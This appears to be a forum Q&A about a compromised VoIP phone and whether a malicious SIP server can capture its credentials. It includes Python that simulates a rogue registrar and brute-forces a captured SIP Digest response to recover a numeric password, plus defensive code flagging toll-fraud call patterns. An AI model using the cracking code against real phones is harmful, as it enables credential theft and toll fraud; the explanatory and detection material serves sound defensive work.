To make a long story short, a client phone was compromised and used to make illicit calls. An investigation revealed a port forwarding entry to the phone's web UI, which is "protected" by a 6-digit numeric password. We're assuming this was compromised, and are now trying to figure out how they got an extension password from there (it's not available to the UI, nor is it contained in the config file backups you can retrieve from the web UI). One thing they can do via the web UI is change the registration server.
I know the password is never sent in clear text, but I think the main purpose of the challenge/response authentication is to ensure that the client is who they say they are, for the server's protection. I don't know how much protection is afforded to the client. So, my question: if an endpoint attempts registration against a malicious SIP server, can that server obtain the SIP credentials?
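As an added illustration of the exchange the question asks about (this is example code written for this page, not anything from the original poster or a real phone's firmware): SIP registration uses HTTP Digest (RFC 2617 as profiled by RFC 3261). The handset never sends the password, but it does send MD5(HA1:nonce:HA2) with HA1 = MD5(user:realm:password), and the realm and nonce are chosen by whatever server it is pointed at. A rogue registrar therefore captures a value it can brute-force offline against whatever it chose, which is fatal for short numeric passwords. The realm `rogue.example`, the nonce, the extension `1001`, its password `4711` and the request URI are all constructed here; the handset side is simulated by a function rather than real SIP over the network.

```python
import hashlib
import re


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 Digest as SIP uses it: MD5 without qop, or MD5 with qop=auth.
    HA1 = MD5(user:realm:password) is the only place the password enters;
    realm and nonce come from the server, so a rogue server controls them."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop:
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_params(header_value):
    """Turn 'Digest k="v", k2=v2' into a dict (quoted and bare values)."""
    scheme, _, params = header_value.partition(" ")
    assert scheme.lower() == "digest"
    return {k: quoted or bare for k, quoted, bare in _PARAM.findall(params)}


def rogue_challenge(realm, nonce):
    """The 401 challenge an attacker-controlled registrar sends (constructed)."""
    return f'WWW-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5'


def phone_register(username, password, challenge, uri="sip:pbx.example.net"):
    """Simulated handset: re-sends REGISTER with an Authorization header."""
    ch = parse_digest_params(challenge.split(": ", 1)[1])
    resp = digest_response(username, ch["realm"], password, "REGISTER", uri, ch["nonce"])
    return (f'Authorization: Digest username="{username}", realm="{ch["realm"]}", '
            f'nonce="{ch["nonce"]}", uri="{uri}", response="{resp}", algorithm=MD5')


def crack_digest(authorization, method, candidates):
    """Offline guess of the password from a captured Authorization header.
    Everything needed is in the header; no further contact with the phone."""
    a = parse_digest_params(authorization.split(": ", 1)[1])
    for pw in candidates:
        if digest_response(a["username"], a["realm"], pw, method, a["uri"], a["nonce"],
                           a.get("qop"), a.get("nc"), a.get("cnonce")) == a["response"]:
            return pw
    return None


def demo():
    # Attacker picks realm and nonce; the phone answers with its credential digest.
    challenge = rogue_challenge("rogue.example", "deadbeef")
    captured = phone_register("1001", "4711", challenge)      # constructed sample
    # Four-digit numeric PINs fall in one pass; six digits is only 100x more work.
    return crack_digest(captured, "REGISTER", (f"{i:04d}" for i in range(10000)))


if __name__ == "__main__":
    print("recovered extension password:", demo())
```

Because the attacker also fixes the realm and nonce, the guessing can even be precomputed before the phone ever connects; the only protection the challenge/response gives the client is that the password itself is not on the wire, which is worth little when the password space is small.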
Attacks against phone sets are a current trend in VoIP hacking. There are well known bugs in web GUIs of phones that expose their contents (including SIP credentials used to register with the SIP server). As some phone sets are directly attached to the internet, it's difficult to protect them. (If on an internal network, the GUIs should not be exposed.)
One attack involves DNS poisoning which causes the endpoint to register with a foreign SIP server, and exposes the credentials.
While keeping phone firmware up to date is a good idea, be sure to use a PBX security system which can detect suspicious dialing patterns, unusual number/rate of calls in progress, etc. Simple tools like 'fail2ban' will never catch such an attack. As well, attacks using 'spread IP' make it hard to block unless your VoIP security system can detect them.
Have a look at the voip-info page on security and its suggestions on ideas and products to detect and block such attacks.
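As an added example of the kind of call-pattern detection the answer recommends (example code written for this page, not the answerer's or any product's): the checks run over constructed CDR lines of the form `timestamp,extension,source_ip,dialed_number` and flag an extension whose call rate jumps, whose calls arrive from many source addresses in a short window, or which dials expensive prefixes during quiet hours. The thresholds, the quiet-hours range and the `EXPENSIVE_PREFIXES` list are assumptions a site would tune to its own dial plan; the addresses are RFC 5737 documentation ranges and the numbers are made up. The answer's "spread IP" is read here as abuse arriving from many source addresses, so the example aggregates per extension rather than per address, which is exactly the aggregation a per-IP tool like fail2ban does not do.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample CDR lines (not real traffic): timestamp,extension,source_ip,dialed_number
SAMPLE_CDR = """\
2024-03-02T02:10:05,1001,203.0.113.7,0090212000001
2024-03-02T02:10:21,1001,203.0.113.8,0090212000002
2024-03-02T02:10:40,1001,198.51.100.12,0090212000003
2024-03-02T02:11:02,1001,198.51.100.13,0090212000004
2024-03-02T02:11:30,1001,203.0.113.9,0090212000005
2024-03-02T02:12:01,1001,198.51.100.14,0090212000006
2024-03-02T09:15:00,1002,192.0.2.10,02075550100
2024-03-02T09:42:17,1002,192.0.2.10,02075550123
2024-03-02T10:05:44,1002,192.0.2.10,02075550199
"""

# Assumption: international (00) and premium-rate (09) prefixes for this site's dial plan.
EXPENSIVE_PREFIXES = ("00", "09")


def parse_cdr(text):
    """Parse the four-column CDR format above into sorted (ts, ext, ip, dialed) tuples."""
    rows = []
    for line in text.strip().splitlines():
        ts, ext, ip, dialed = line.split(",")
        rows.append((datetime.fromisoformat(ts), ext, ip, dialed))
    return sorted(rows)


def detect(rows, window=timedelta(minutes=5), max_calls=5, max_ips=2,
           expensive=EXPENSIVE_PREFIXES, quiet_hours=range(0, 6)):
    """Return sorted (rule, extension) findings over a sliding time window.

    call_rate:           more than max_calls calls from one extension inside the window
    spread_ip:           one extension's calls come from more than max_ips source addresses
    expensive_off_hours: a call to an expensive prefix during quiet hours
    """
    findings = set()
    recent = defaultdict(deque)  # extension -> deque of (ts, ip) still inside the window
    for ts, ext, ip, dialed in rows:
        q = recent[ext]
        q.append((ts, ip))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) > max_calls:
            findings.add(("call_rate", ext))
        if len({src for _, src in q}) > max_ips:
            findings.add(("spread_ip", ext))
        if dialed.startswith(expensive) and ts.hour in quiet_hours:
            findings.add(("expensive_off_hours", ext))
    return sorted(findings)


def demo():
    return detect(parse_cdr(SAMPLE_CDR))


if __name__ == "__main__":
    for rule, ext in demo():
        print(f"{rule:20s} extension {ext}")
```

In the sample, extension 1001 trips all three rules within two minutes while 1002's daytime local calls from a single address trip none; a real deployment would feed the same logic from the PBX's CDR stream and act on a finding by disabling the extension or rate-limiting its trunk access rather than blocking individual source addresses.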